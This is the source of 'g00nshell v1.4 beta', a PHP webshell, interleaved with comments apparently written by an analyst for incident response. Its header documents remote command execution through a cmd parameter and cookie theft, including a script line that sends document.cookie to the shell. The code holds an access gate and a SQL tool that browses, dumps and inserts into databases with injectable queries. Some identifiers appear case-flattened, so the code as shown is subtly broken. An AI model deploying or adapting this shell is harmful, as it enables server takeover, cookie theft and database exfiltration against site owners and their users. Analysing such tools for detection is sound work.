php
/*
######################################################################
# [g00n]fish presents: #
# g00nshell v1.4 beta #
############################documentation#############################
#to execute commands, simply include ?cmd=___ in the url. #
#ex: http://site.com/shl.php?cmd=whoami #
# #
#to steal cookies, use ?cookie=___ in the url. #
#ex: <script>document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies</script> #
# #
#in the ajax command shell, type 'home' to return to the shell's #
#directory. type 'clear' to clear the output screen. #
##########################verification levels#########################
#0: no protection; anyone can access #
#1: user-agent required #
#2: require ip #
#3: basic authentication #
##############################known bugs##############################
#the sql tool is not complete. there is currently no editing function#
#available. some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################shouts################################
#pr0be - beta testing & css #
#trintitty - beta testing #
#clorox - beta testing #
#everyone else at g00ns.net #
########################note to administrators########################
#if this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/
// configuration
// Webshell ("g00nshell 1.4 beta") configuration and request dispatch. Analyst notes:
// $auth selects the access gate (0 none, 1 User-Agent hash, 2 source-IP allowlist,
// 3 HTTP basic auth); the values below are md5 digests hard-coded by the operator.
// For IR, these constants, the request parameter names read below and the session
// keys used by the SQL tool are the stable indicators to look for in logs.
// NOTE(review): identifiers in this listing look case-flattened ($_server, $_get,
// $row['field']) -- presumably an artifact of the page, not of the deployed source.
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 encoded user-agent
$ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access shell
$email = ""; // e-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password
// global variables
$version = '1.4 beta';
// Self-URL and host info taken from the request. split() was removed in PHP 7, as
// were the mysql_* functions used further down, so this only runs on PHP 5 hosts.
$self = $_server['php_self'];
$soft = $_server['server_software'];
$servinf = split('[:]', $_server['http_host']);
$servip = $servinf[0];
$servport = @$servinf[1] ? $servinf[1] : '80';
// Request parameters the shell dispatches on: cmd, act, dir, img (GET),
// contents and gf (POST), plus cookie, f and ajxcmd tested below. These names
// appearing in access logs against this path are the detection signal.
$cmd = @$_get['cmd'];
$act = @$_get['act'];
$cmd = @$_get['cmd']; // duplicate of the assignment two lines up; no effect
$curdir = cleandir(getcwd());
// 'nullz' is a sentinel dir value that skips cleandir() (defined elsewhere in the file).
if(@$_get['dir']){
$dir = $_get['dir'];
if($dir != 'nullz') $dir = cleandir($dir);
}
$contents = @$_post['contents'];
$gf = @$_post['gf'];
$img = @$_get['img'];
// credits to disruptiv for this bit ;)
// $me is the base URL used for the shell's own links: when the shell was pulled in
// by another script (more than one included file) it is the request URI cut at the
// first '&'; otherwise $php_self . "?". Both operands of the || are the same test.
if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) =
explode("&", $_server['request_uri']);
else $me = $php_self . "?";
// Warnings are suppressed with @ throughout, so failures leave nothing in the PHP error log.
@session_start();
@set_time_limit(5);
// Access gate. hide() and userauth() are defined elsewhere in the file. Level 1
// requires md5(User-Agent) to equal $uakey; level 2 requires REMOTE_ADDR to be in
// $ip; level 3 calls userauth() when no basic-auth user was sent -- the credential
// comparison is not in this block.
switch($auth){ // authentication switcher
case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break;
case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break;
case 3: if(!$_server['php_auth_user']) userauth(); break;
default: break;
}
// With no tool parameter present, render the menu (main(), defined elsewhere).
if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img
&& !@$_get['ajxcmd']) main();
if (@$_get['db']){
mysql_select_db($_get['db'], $sqlcon);
if(@$_get['sqlquery']){
$dat = mysql_query($_get['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++)
echo(mysql_result($dat, $i) . "<br>\n");
}
else if(@$_get['table'] && !@$_get['sqlf']){
echo("<a href='" . $me . "&act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&sqlf=ins" . "'>insert row</a><br><br>\n");
echo("<table border='1'>");
$query = "show columns from " . $_get['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<th>" . $fields[$i]);
$i++;
}
$result = mysql_query("select * from " . $_get['table'], $sqlcon) or
die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!@$_get['p'])
$_get['p'] = 1;
if(@$_get['p']){
if($y > (30*($_get['p']-1)) && $y <= 30*($_get['p'])){
echo("<tr>");
for($i=0;$i<count($fields);$i++){
$query = "select " . $fields[$i] . " from " .
$_get['table'] . " where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or
die(mysql_error());
while($row = mysql_fetch_row($dat))
echo("<td>" . $row[0] . "</td>");
}
echo("</tr>\n");
}
}
$y++;
}
echo("</table>\n");
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("<a href='" . $me . "act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
}
}
elseif(@$_get['table'] && @$_get['sqlf']){
switch($_get['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_get['sqlf'] = "";
}
}
else{
echo("<table>");
$query = "show tables from " . $_get['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat))
echo("<tr><td><a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='" . $me .
"&act=sql&db=" . $_get['db'] . "&table=" . $row[0] ."&sqlf=dl" .
"'>download</a>]</td></tr>\n");
echo("</table>");
}
}
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs))
echo("<a href='" . $me . "&act=sql&db=" . $row->database . "'>" .
$row->database . "</a><br>\n");
}
mysql_close($sqlcon);
}
/**
 * SQL tool, "insert row" page of the webshell.
 *
 * Connects with database credentials the operator stored earlier in the PHP
 * session (sql_host, sql_port, sql_user, sql_password), so on a compromised host
 * the session store is where those credentials, and evidence of which databases
 * were touched, can be recovered. Reads db and table from GET. On a POST carrying
 * 'ins' it builds an INSERT from the remaining POST fields by string concatenation
 * and echoes both the POST array and the final statement into the response, so
 * captured responses or proxy logs contain the exact statement that was executed.
 * Without 'ins' it renders a form with one text input per column of the table.
 */
function sqlinsert(){
style();
// Credentials come from the session, not from this request; presumably stored by
// the SQL login form elsewhere in the file (not shown here).
$sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'],
$_session['sql_user'], $_session['sql_password']);
mysql_select_db($_get['db'], $sqlcon);
// 'ins' is the name of the submit button rendered below; its presence marks a submission.
if(@$_post['ins']){
unset($_post['ins']);
// Column names are the POST field names: array_flip yields value=>name, so
// imploding it gives the names while imploding $_post gives the values.
$fields = array_flip($_post);
// Debug output left in: the response discloses the submitted fields and, below,
// the raw statement.
print_r($_post);
$f = implode(",", $fields);
$v = implode("','", $_post);
// Table name, column names and values are concatenated straight from the request.
$query = "insert into " . $_get['table'] . " (" . $f . ") values ('" . $v
. "')";
echo($query);
// Server-side mysql_error() text is returned to the client on failure.
mysql_query($query, $sqlcon) or die("mysql error: " . mysql_error());
die("row inserted.<br>\n<a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $_get['table'] . "'>go back</a>");
}
// Form path: enumerate the table's columns to build one input per column.
$query = "show columns from " . @$_get['table'];
$result = mysql_query($query, $sqlcon) or die("mysql error: " .
mysql_error());
$i = 0;
$fields = array();
echo("<form method='post'>");
echo("<table>");
while($row = mysql_fetch_assoc($result)){
// 'field' is case-flattened in this listing; SHOW COLUMNS names the column 'Field'.
array_push($fields, $row['field']);
echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" .
$fields[$i] . "'><br>\n");
$i++;
}
echo("</table>");
echo("<br>\n<input type='submit' value='insert' name='ins'>");
echo("</form>");
}
/**
 * Render a byte count as a short human-readable string.
 *
 * Rounds to a whole number of the largest unit that fits (b, kb, mb, gb);
 * a zero/empty size yields "0 b".
 *
 * @param int|float|null $size byte count
 * @return string e.g. "512 b", "2 kb", "3 mb", "1 gb"
 */
function nicesize($size){
    if(!$size) return "0 b";
    // Largest unit first; first divisor that fits wins.
    $units = array(1073741824 => " gb", 1048576 => " mb", 1024 => " kb");
    foreach($units as $divisor => $label){
        if($size >= $divisor) return(round($size / $divisor) . $label);
    }
    return($size . " b");
}